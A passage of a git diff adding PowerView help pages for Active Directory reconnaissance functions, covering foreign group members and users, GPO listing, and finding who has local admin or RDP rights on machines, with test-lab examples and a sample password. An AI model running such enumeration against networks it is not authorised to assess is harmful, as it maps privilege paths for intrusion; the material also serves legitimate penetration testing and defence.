+Aliases:
+
+Required: False
+Position: 7
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 8
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### String
+
+One or more strings representing file server names.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainForeignGroupMember.md b/docs/Recon/Get-DomainForeignGroupMember.md new file mode 100755 index 0000000..9061774 --- /dev/null +++ b/docs/Recon/Get-DomainForeignGroupMember.md @@ -0,0 +1,238 @@ +# Get-DomainForeignGroupMember
+
+## SYNOPSIS
+Enumerates groups with users outside of the group's domain and returns
+each foreign member.
+This is a domain's "incoming" access.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainGroup
+
+## SYNTAX
+
+```
+Get-DomainForeignGroupMember [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-DomainGroup to enumerate all groups for the current (or target) domain,
+then enumerates the members of each group, and compares the member's domain
+name to the parent group's domain name, outputting the member if the domains differ.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainForeignGroupMember
+```
+
+Return all group members in the current domain where the group and member differ.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainForeignGroupMember -Domain dev.testlab.local
+```
+
+Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
+
+Return all group members in the dev.testlab.local domain where the member is
+not in dev.testlab.local.
+binding to the secondary.dev.testlab.local for
+queries, and using the specified alternate credentials.
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ForeignGroupMember
+
+Custom PSObject with translated group member property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainForeignUser.md b/docs/Recon/Get-DomainForeignUser.md new file mode 100755 index 0000000..85b0092 --- /dev/null +++ b/docs/Recon/Get-DomainForeignUser.md @@ -0,0 +1,239 @@ +# Get-DomainForeignUser
+
+## SYNOPSIS
+Enumerates users who are in groups outside of the user's domain.
+This is a domain's "outgoing" access.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainUser
+
+## SYNTAX
+
+```
+Get-DomainForeignUser [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-DomainUser to enumerate all users for the current (or target) domain,
+then calculates the given user's domain name based on the user's distinguishedName.
+This domain name is compared to the queried domain, and the user object is
+output if they differ.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainForeignUser
+```
+
+Return all users in the current domain who are in groups not in the
+current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainForeignUser -Domain dev.testlab.local
+```
+
+Return all users in the dev.testlab.local domain who are in groups not in the
+dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
+
+Return all users in the dev.testlab.local domain who are in groups not in the
+dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and
+using the specified alternate credentials.
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ForeignUser
+
+Custom PSObject with translated user property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainGPO.md b/docs/Recon/Get-DomainGPO.md new file mode 100755 index 0000000..9d0a468 --- /dev/null +++ b/docs/Recon/Get-DomainGPO.md @@ -0,0 +1,354 @@ +# Get-DomainGPO
+
+## SYNOPSIS
+Return all GPOs or specific GPO objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty
+
+## SYNTAX
+
+### None (Default)
+```
+Get-DomainGPO [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
+ [-Raw]
+```
+
+### ComputerIdentity
+```
+Get-DomainGPO [[-Identity] <String[]>] [-ComputerIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+### UserIdentity
+```
+Get-DomainGPO [[-Identity] <String[]>] [-UserIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all GPO objects for
+the current domain are returned.
+To enumerate all GPOs that are applied to
+a particular machine, use -ComputerName X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGPO -Domain testlab.local
+```
+
+Return all GPOs for the testlab.local domain
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGPO -ComputerName windows1.testlab.local
+```
+
+Returns all GPOs applied windows1.testlab.local
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO
+```
+
+Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display
+name of "Test GPO"
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
+```
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPO -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A display name (e.g.
+'Test GPO'), DistinguishedName (e.g.
+'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g.
+'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g.
+'{F260B76D-55C8-46C5-BEF1-9016DD98E272}').
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerIdentity
+Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).
+
+```yaml
+Type: String
+Parameter Sets: ComputerIdentity
+Aliases: ComputerName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).
+
+```yaml
+Type: String
+Parameter Sets: UserIdentity
+Aliases: UserName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GPO
+
+Custom PSObject with translated GPO property fields.
+
+PowerView.GPO.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md new file mode 100755 index 0000000..4e5015b --- /dev/null +++ b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md @@ -0,0 +1,263 @@ +# Get-DomainGPOComputerLocalGroupMapping
+
+## SYNOPSIS
+Takes a computer (or GPO) object and determines what users/groups are in the specified
+local group for the machine through GPO correlation.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup
+
+## SYNTAX
+
+### ComputerIdentity (Default)
+```
+Get-DomainGPOComputerLocalGroupMapping [-ComputerIdentity] <String> [-LocalGroup <String>] [-Domain <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### OUIdentity
+```
+Get-DomainGPOComputerLocalGroupMapping -OUIdentity <String> [-LocalGroup <String>] [-Domain <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups
+are in the specified local group for a target machine through GPO correlation.
+
+If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to
+determine the OU the computer is a part of.
+Then resolve the computer's site name with
+Get-NetComputerSiteName and retrieve all sites object Get-DomainSite.
+For those results, attempt to
+enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup.
+For
+each resulting GPO group, resolve the resulting user/group name to a full AD object and
+return the results.
+This will return the domain objects that are members of the specified
+-LocalGroup for the given computer.
+
+Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and
+localgroup specifications.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local
+```
+
+Finds users who have local admin rights over WINDOWS3 through GPO correlation.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP
+```
+
+Finds users who have RDP rights over WINDOWS4 through GPO correlation.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local
+
+## PARAMETERS
+
+### -ComputerIdentity
+A SamAccountName (e.g.
+WINDOWS10$), DistinguishedName (e.g.
+CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g.
+4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g.
+windows10.testlab.local) for the computer to identity GPO local group mappings for.
+
+```yaml
+Type: String
+Parameter Sets: ComputerIdentity
+Aliases: ComputerName, Computer, DistinguishedName, SamAccountName, Name
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -OUIdentity
+An OU name (e.g.
+TestOU), DistinguishedName (e.g.
+OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g.
+8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for.
+
+```yaml
+Type: String
+Parameter Sets: OUIdentity
+Aliases: OU
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID.
+Defaults to local 'Administrators'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GGPOComputerLocalGroupMember
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainGPOLocalGroup.md b/docs/Recon/Get-DomainGPOLocalGroup.md new file mode 100755 index 0000000..e61fb82 --- /dev/null +++ b/docs/Recon/Get-DomainGPOLocalGroup.md @@ -0,0 +1,259 @@ +# Get-DomainGPOLocalGroup
+
+## SYNOPSIS
+Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups'
+or Group Policy preferences.
+Also return their user membership mappings, if they exist.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-DomainGPOLocalGroup [[-Identity] <String[]>] [-ResolveMembersToSIDs] [-Domain <String>]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed
+arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
+group membership is set through Group Policy Preferences groups.xml files.
+For any
+GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
+section data is processed if present.
+Any found Groups.xml files are parsed with
+Get-GroupsXML and those memberships are returned as well.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGPOLocalGroup
+```
+
+Returns all local groups set by GPO along with their members and memberof.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGPOLocalGroup -ResolveMembersToSIDs
+```
+
+Returns all local groups set by GPO along with their members and memberof,
+and resolve any members to their domain SIDs.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup
+```
+
+Return any GPO-set groups for the GPO with the given name/GUID.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainGPOLocalGroup 'Desktops'
+```
+
+Return any GPO-set groups for the GPO with the given display name.
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOLocalGroup -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A display name (e.g.
+'Test GPO'), DistinguishedName (e.g.
+'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g.
+'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g.
+'{F260B76D-55C8-46C5-BEF1-9016DD98E272}').
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ResolveMembersToSIDs
+Switch.
+Indicates that any member names should be resolved to their domain SIDs.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
